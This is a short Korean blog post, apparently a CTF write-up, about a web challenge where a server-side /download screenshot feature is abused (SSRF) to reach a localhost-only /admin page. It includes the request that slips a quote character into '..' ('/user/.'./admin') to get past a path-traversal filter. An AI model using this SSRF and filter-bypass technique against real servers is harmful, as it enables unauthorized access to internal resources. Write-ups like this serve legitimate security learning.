티스토리 뷰
문제 정보
>Request< GET /robots.txt
>Response< User-agent: * Disallow: /admin
>Reauest< GET /admin
>Response< Unauthorized IP: ::ffff:211.63.33.191
>Request<
POST /download HTTP/1.1 download=download&url=http://localhost:2999/user/?username=nooriro&preview=preview
>Response<
HTTP/1.1 200 OK
<meta http-equiv='refresh' content='1;URL=/user/'>Redirecting…
-
문제의 핵심은 서버에서 /admin으로 접속하는 것
-
/download에 url 파라미터를 보내면 url 파라미터 값을 서버가 접속 후 캡쳐해서 사용자에게 보여줌
-
-
http:/localhost:2999/user/ 는 변경되면 ERROR 출력
-
.. 이 들어가면 hacking attempt 출력
-
/user/ 뒤에는 ‘ 문자를 넣으면 공백으로 처리되며 사라짐
-
공격
>Request<
POST /download HTTP/1.1
download=download&url=http://localhost:2999/user/.’./admin
>Response<
HTTP/1.1 200 OK
<meta http-equiv='refresh' content='1;URL=/user/'>Redirecting…
'해답 > '3'' 카테고리의 다른 글
| [WEB][facebookCTF2019] products manager (0) | 2019.10.28 |
|---|---|
| [Defcon2019] speedrun-003 (0) | 2019.10.28 |
| [WEB][hack.lu CTF 2019] RPDG (0) | 2019.10.28 |
| [web][PoX 본선]Power of XX (0) | 2017.11.21 |
| (initramfs) (0) | 2017.07.07 |
댓글